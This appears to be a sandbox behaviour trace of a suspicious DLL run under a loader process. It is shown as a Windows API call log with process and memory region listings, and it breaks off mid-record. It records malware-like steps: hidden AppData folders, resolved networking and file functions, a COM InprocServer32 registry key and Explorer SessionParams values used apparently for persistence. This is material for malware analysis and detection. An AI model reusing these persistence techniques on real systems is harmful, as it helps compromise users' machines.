[0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.088] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.088] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.088] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.088] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.088] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.088] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.088] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.088] SetLastError (dwErrCode=0x0) [0032.088] GetLastError () returned 0x0 [0032.095] SetLastError (dwErrCode=0x0) [0032.095] GetLastError () returned 0x0 [0032.095] SetLastError (dwErrCode=0x0) [0032.095] GetLastError () returned 0x0 [0032.095] SetLastError (dwErrCode=0x0) [0032.095] GetLastError () returned 0x0 [0032.095] SetLastError (dwErrCode=0x0) [0032.095] GetLastError () returned 0x0 [0032.095] SetLastError (dwErrCode=0x0) [0032.095] GetLastError () returned 0x0 [0032.095] SetLastError (dwErrCode=0x0) [0032.095] GetLastError () returned 0x0 [0032.095] SetLastError (dwErrCode=0x0) [0032.095] GetLastError () returned 0x0 [0032.095] SetLastError (dwErrCode=0x0) [0032.095] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.096] GetLastError () returned 0x0 [0032.096] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.097] GetLastError () returned 0x0 [0032.097] SetLastError (dwErrCode=0x0) [0032.098] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.098] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.098] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7e8 | out: lpSystemTimeAsFileTime=0x2ef7e8*(dwLowDateTime=0xe0da7a50, dwHighDateTime=0x1d3dfba)) [0032.099] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef720, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.099] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef608, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.099] GetLastError () returned 0x0 [0032.099] GetLastError () returned 0x0 [0032.099] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetLastError () returned 0x0 [0032.100] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.100] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.100] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.100] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.100] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.100] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.100] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.100] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.100] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.100] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.100] GetLastError () returned 0xb7 [0032.100] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.100] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.101] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.101] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.101] wsprintfA (in: param_1=0x2ef488, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.101] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.101] wsprintfA (in: param_1=0x2ef384, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.101] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.101] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.101] CloseHandle (hObject=0x74) returned 1 [0032.101] GetLastError () returned 0x0 [0032.101] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.101] GetLastError () returned 0x0 [0032.101] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.101] GetSystemDirectoryA (in: lpBuffer=0x2ef488, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.101] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.102] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.102] CloseHandle (hObject=0x74) returned 1 [0032.102] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.102] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.102] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.103] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.103] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.103] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.103] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.103] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.104] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.104] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.104] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.105] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.105] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.105] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.106] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.106] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.106] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.106] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.106] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.106] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.107] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.107] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.107] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.107] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.107] GetVersionExW (in: lpVersionInformation=0x2efa0c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2efa0c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0032.107] GetLastError () returned 0x7f [0032.107] SetLastError (dwErrCode=0x7f) [0032.107] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2ef700, lpdwDisposition=0x0 | out: phkResult=0x2ef700*=0x7c, lpdwDisposition=0x0) returned 0x0 [0032.107] RegSetValueExW (in: hKey=0x7c, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="0", cbData=0x4 | out: lpData="0") returned 0x0 [0032.107] GetLastError () returned 0x7f [0032.107] GetLastError () returned 0x7f [0032.107] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x2ef80c, lpdwDisposition=0x2ef968 | out: phkResult=0x2ef80c*=0x80, lpdwDisposition=0x2ef968*=0x2) returned 0x0 [0032.107] RegSetValueExA (in: hKey=0x80, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x2ef810*=0xe10, cbData=0x4 | out: lpData=0x2ef810*=0xe10) returned 0x0 [0032.107] RegSetValueExA (in: hKey=0x80, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x2ef810*=0x1, cbData=0x4 | out: lpData=0x2ef810*=0x1) returned 0x0 [0032.107] RegSetValueExA (in: hKey=0x80, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x72ee31d4*, cbData=0x2 | out: lpData=0x72ee31d4*) returned 0x0 [0032.108] RegSetValueExA (in: hKey=0x80, lpValueName="Plgv", Reserved=0x0, dwType=0x3, lpData=0x2ef8b4*, cbData=0x58 | out: lpData=0x2ef8b4*) returned 0x0 [0032.108] RegSetValueExA (in: hKey=0x80, lpValueName="Plpv", Reserved=0x0, dwType=0x3, lpData=0x2ef90c*, cbData=0x5c | out: lpData=0x2ef90c*) returned 0x0 [0032.108] RegSetValueExA (in: hKey=0x80, lpValueName="ISFValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0032.108] RegSetValueExA (in: hKey=0x80, lpValueName="ISRValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0032.108] RegCloseKey (hKey=0x80) returned 0x0 [0032.109] HeapDestroy (hHeap=0x7b0000) returned 1 Process: id = "18" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f8a0" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 898 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 899 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 900 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 901 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 902 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 903 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 904 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 905 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 906 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 907 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 908 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 909 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 910 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 911 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 912 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 913 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 914 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 915 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 916 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 917 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 918 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 919 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 920 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 921 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 922 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 923 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 924 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 925 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 926 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 927 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 928 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 929 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 930 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 931 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 932 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 933 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 934 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 935 start_va = 0x1200000 end_va = 0x13cffff entry_point 